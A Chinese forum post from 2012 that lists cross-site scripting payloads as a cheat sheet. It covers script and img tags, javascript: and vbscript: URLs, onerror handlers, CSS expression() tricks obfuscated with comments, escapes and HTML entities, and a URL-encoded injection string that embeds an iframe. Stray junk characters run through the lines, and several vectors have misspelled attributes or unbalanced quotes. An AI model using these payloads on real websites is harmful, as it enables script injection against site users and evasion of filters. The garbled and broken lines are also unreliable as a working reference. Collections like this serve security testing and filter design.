<script>alert("跨站")</script> (最常用)
. A% f% t, g& r. C<img scr=javascript:alert("跨站")></img>4 V& q8 y. d; {0 q8 U
<img scr="javascript: alert(/跨站/)></img>8 {( W; d" x( s- D. G3 c0 H z3 J
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
: x( l, ^! q0 j, j( F<img scr="#" onerror=alert(/跨站/)></img>' `8 ~$ W1 d7 P$ p$ o" l
<img scr="#" style="xss:expression(alert(/xss/));"></img>0 z( v2 F; L4 ^
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
, v; }4 B& k2 |$ O) F1 Z- E# b<img src=vbscript:msgbox ("xss")></img>
+ j5 f( e. H& T/ W<style> input {left:expression (alert('xss'))}</style>
- v( l y! j2 L2 e! F# p<div style={left:expression (alert('xss'))}></div>, e% A2 V; I! [3 Q p: e" M
<div style={left:exp/* */ression (alert('xss'))}></div>
5 k7 y; c/ n$ O7 q% J<div style={left:\0065\0078ression (alert('xss'))}></div>
. n6 L5 o. r4 rhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
" u$ {; M! m; F8 h/ t9 z7 @unicode <div style="{left:expRessioN (alert('xss'))}">, f9 M: l& s( V% U0 s6 J
1 q- K$ ]9 J6 \4 d"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
) J, h4 b! l( F |
发表于 2012-9-13 17:15:04
收藏
支持
反对